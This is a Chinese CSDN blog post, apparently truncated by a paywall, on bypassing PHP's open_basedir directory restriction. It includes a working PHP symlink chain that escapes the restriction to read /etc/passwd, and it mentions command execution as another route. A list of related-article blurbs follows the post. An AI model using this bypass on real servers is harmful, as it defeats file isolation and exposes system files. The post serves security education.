【web安全】你的open_basedir安全吗?

最新推荐文章于 2023-03-17 09:27:01 发布
最新推荐文章于 2023-03-17 09:27:01 发布
阅读量602 收藏
点赞数
分类专栏: 网络 安全 文章标签: 安全 web安全 php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/123114332
版权
本文探讨了PHP的open_basedir配置的安全性和如何绕过限制。内容包括open_basedir的限制作用,多种绕过方法,如命令执行、syslink函数、glob伪协议等,并介绍了如何利用ini_set()动态改变配置。文章总结了各种绕过策略的优缺点,提醒开发者关注此安全设置。
摘要由CSDN通过智能技术生成

一、open_basedir

看一下php.ini里面的描述:

 ; open_basedir, if set, limits all file operations to the defined directory
; and below. This directive makes most sense if used in a per-directory or
; per-virtualhost web server configuration file. This directive is
; *NOT* affected by whether Safe Mode is turned On or Off.

open_basedir可将用户访问文件的活动范围限制在指定的区域,通常是其目录的路径,也可用符号"."来代表当前目录。

注意用open_basedir指定的限制实际上是前缀,而不是目录名。(其实我也是才知道的)
比如open_basedir = /dir/user", 那么目录 “/dir/user” 和 "/dir/user1"都是可以访问的,所以如果要将访问限制在仅为指定的目录,可以将open_basedir = /dir/user/

二、Bypass

命令执行

为什么选命令执行,因为open_basedir和命令执行无关,就可以直接获取目标文件。

如果遇到disable_functions,就多换几个函数;如果关键字被过滤,办法也很多,可以参考大佬文章

【安全技术学习文档】

syslink() php 4/5/7/8

symlink(string $target, string $link): bool

原理是创建一个链接文件 aaa 用相对路径指向 A/B/C/D,再创建一个链接文件 abc 指向 aaa/…/…/…/…/etc/passwd,其实就是指向了 A/B/C/D/…/…/…/…/etc/passwd,也就是/etc/passwd。这时候删除 aaa 文件再创建 aaa 目录但是 abc 还是指向了 aaa 也就是 A/B/C/D/…/…/…/…/etc/passwd,就进入了路径/etc/passwd
payload 构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个../来设置目标文件。

 <?php
highlight_file ( __FILE__ );
mkdir ( "A" ); //创建目录
chdir ( "A" ); //切换目录
mkdir ( "B" );
chdir ( "B" );
mkdir ( "C" );
chdir ( "C" );
mkdir ( "D" );
chdir ( "D" );
chdir ( ".." );
chdir ( ".." );
chdir ( ".." );
chdir ( ".." );
symlink ( "A/B/C/D" , "aaa" );
symlink ( "aaa/../../../../etc/passwd" , "abc" );
unlink ( "aaa" );
mkdir ( "aaa" );
?>

暴力破解

最低0.47元/天 解锁文章
IT老涵
关注
专栏目录
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5534
简单绕过open_basedir 的几种方法
open_basedir php.ini,PHP 配置文件中open_basedir选项作用_PHP
weixin_39982537的博客
03-10 1656
在MySQL数据库中,Opened_tables表示打开过的表数量,下面将对MySQL Open_Table的合理配置作详细的说明介绍。MySQL Opened_tables表示打开过的表数量,下文就将教您如何合理配置MySQL Open_Table的值,希望对您学习MySQL数据库能有所帮助...如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, lim...
php文件包含目录配置open_basedir的使用与性能详解
10-20
下面小编就为大家带来一篇php文件包含目录配置open_basedir的使用与性能详解。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
php open_basedir 安全,php open_basedir安全与使用详解
weixin_29603489的博客
03-18 441
open_basedir的作用就是指定目录位置了,意思是将PHP 所能打开的文件限制在指定的目录树,包括文件本身了,并且不受是不是安全模式的影响.如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, limits all file operations to the defined directory; and below. This directive m...
open_basedir后可能存在的安全隐患
weixin_34384681的博客
03-24 93
http://www.oldjun.com/blog/index.php/archives/80/ 目前php站点的安全配置基本是open_basedir+safemode,确实很无敌、很安全,即使在权限没有很好设置的环境中,这样配 置都是相当安全的,当然了,不考虑某些可以绕过的情况。本文讨论两点开启open_basedir后可能导致的安全隐患(现实遇到的),一个...
php文件包含目录配置open_basedir的使用与性能分析
热门推荐
傲雪星枫
01-15 4万+
本文将介绍php文件包含目录配置open_basedir的使用方法,并对使用了open_basedir之后的服务器性能进行分析,分析使用后的利与弊。
php open_basedir设置以及关于安全
ecshop数据采集发布接口,zencart,lightinthebox,shopex 采集,快客
10-17 922
#!/usr/bin/k4shifz 看了军神blog,回来研究的。 open_basedir可将用户访问文件的活动范围限制在指定的区域,通常是其家目录的路径,也可用符号"."来代表当前目录。注意用open_basedir指定的限制实际上是前缀,而不是目录名。 举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/ot
PHP绕过open_basedir限制操作文件的方法
12-20
当`open_basedir`设置为例如`/home/wwwroot/home/web1/:/tmp/`时,任何通过web1访问服务器的用户只能读取这两个目录内的文件。这里要注意的是,`open_basedir`设定的限制是基于路径的前缀,而不是具体目录,这意味着...
require(): open_basedir restriction in effect 的问题解决方法
漠效的博客
07-07 1万+
前言 我们通常会在配置LNMP/LAMP的web环境的时候会遇到这个问题,现象为web界面会出现白屏或500。 下面介绍的就是这个问题的原因及解决方法。 报错 【1】开启web界面的php的错误提示 &lt;1&gt;前提条件:ThinkPHP5部署在了LAMP/LNMP环境 &lt;2&gt;修改 php.ini(看具体的安装位置) 将 Off 修改为 ...
12.23 open_basedir
weixin_34050427的博客
01-09 103
2019独角兽企业重金招聘Python工程师标准>>> ...
配置open_basedir
qq_53318005的博客
03-09 492
open_basedir将网站限定在指定的目录,做目录的隔离 先在php.ini中设置open_basedir: # vim /usr/local/php/etc/php.ini //搜索open_basedir,改成如下 open_basedir = /usr/local/apache2.4/docs/www.111.com/admin:/tmp 因为限制了PHP只能在/tmp和/usr/local/apache2.4/docs/www.111.com/admin两个目录下面活动,演示如下: # .
15_open_basedir绕过
qq_45301512的博客
02-01 668
将两次结果对比,可以理解open_basedir的作用就是限制访问如果设立在test目录下,那么就只能访问test目录下面的目录或者文件,其它目录下面的内容都无法访问如果不设立open_basedir,任何目录下的内容都可以访问。
open_basedir的配置
weixin_30832143的博客
09-03 316
.user.ini的使用 1.限制目录访问 解锁: chattr -i .user.ini 加锁: chattr +i .user.ini .user.ini配置 open_basedir=/项目路径/:/tmp/:/proc/ 例: open_basedir=/www/aaa/:/tmp/:/proc/ 转载于:ht...
php open_basedir上传,PHP open_basedir详解
weixin_32424555的博客
03-24 191
open_basedir: 将用户可操作的文件限制在某目录下;——————————————————————————–如下是php.ini中的原文说明以及默认配置:; open_basedir, if set, limits all file operations to the defined directory; and below. This directive makes most sense...
PHPopen_basedir是干什么的?底层原理是什么?
最新发布
长风破浪会有时的博客
03-17 1061
后,PHP脚本只能在指定的目录下访问文件或者目录,任何尝试访问在指定目录范围之外的资源都将被禁止访问。仅仅是PHP的一种安全机制,不能代替其他安全措施,如防火墙、加密传输等,因此仍然需要其他安全措施来保护服务器和应用程序的安全。所指定的路径内,如果不在则会被阻止。是一个安全机制,用于限制在PHP脚本中可以打开的文件或目录的范围,从而防止访问非法或未授权的文件系统资源。底层原理是在PHP编译时进行编译选项的设置,使得PHP解释器在运行脚本时会检查文件系统访问请求的路径是否在。
设置open_basedir防止跨站攻击
小马哥的博客
02-06 973
通过设置open_basedirPHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。
php open_basedir的使用与性能分析
newmiracle学习天地
07-13 573
php open_basedir的使用与性能分析 使用方法 /*限制打开的目录*/ ini_set('open_basedir', __DIR__.'/'); 如果 打开不是这个目录 就会报错 failed to open stream: Operation not permitted in F:\phpStudy\WWW\mircoweb\mircoweb\wwwroot
"PHP安全学习:绕过open_basedir限制的技巧总结
php.ini 中设置 open_basedir 的值,比如设置 open_basedir=/var/www/html/ ,那么通过 web 访问服务器的用户就无法获取服务器上除了 /var/www/html/ 这个目录以外的文件。 学习 bypass open_basedir 姿势的初衷...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值